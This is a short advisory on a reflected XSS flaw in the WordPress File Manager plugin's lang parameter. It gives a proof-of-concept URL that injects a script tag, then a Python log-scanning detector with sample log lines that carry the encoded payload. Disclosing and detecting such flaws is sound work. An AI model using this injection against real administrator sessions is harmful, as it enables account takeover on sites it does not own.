Lack of sanitisation in the lang parameter in the admin dashboard could allow an attacker to perform reflected XSS attacks against logged-in administrators.
https://example.com/wp-admin/admin.php?page=wp_file_manager&lang=zh_CN</script><script>alert(`XSS`)</script>
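
A detection sketch for the request shape above, added here as an example and not taken from the advisory or the plugin: it scans access-log lines for wp_file_manager admin requests whose decoded lang value is not a plain locale code. The locale pattern, the function names and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate values are locale codes such as "en", "zh_CN", "de_DE_formal".
LOCALE_RE = re.compile(r"[A-Za-z]{2,3}(?:_[A-Za-z0-9]{2,8}){0,2}")
# Request target inside a combined-format access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php'
    '?page=wp_file_manager&lang=zh_CN HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:02:11 +0000] "GET /wp-admin/admin.php'
    '?page=wp_file_manager&lang=zh_CN%3C/script%3E%3Cscript%3Ealert(%60XSS%60)'
    '%3C/script%3E HTTP/1.1" 200 5140',
    '203.0.113.5 - - [01/Jan/2024:10:03:40 +0000] "GET /wp-admin/admin.php'
    '?page=other_plugin&lang=%3Cb%3E HTTP/1.1" 200 100',
]

def suspicious_lang(url):
    """Return the decoded lang value when the request targets the
    wp_file_manager admin page and lang is not a plain locale code."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if "wp_file_manager" not in query.get("page", []):
        return None
    for value in query.get("lang", []):
        if not LOCALE_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_lang) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            bad = suspicious_lang(match.group(1))
            if bad is not None:
                hits.append((number, bad))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: unexpected lang value {value!r}")
```

The same allowlist idea applies server-side: a lang value that does not match the expected locale pattern can be rejected before it is ever written into the page.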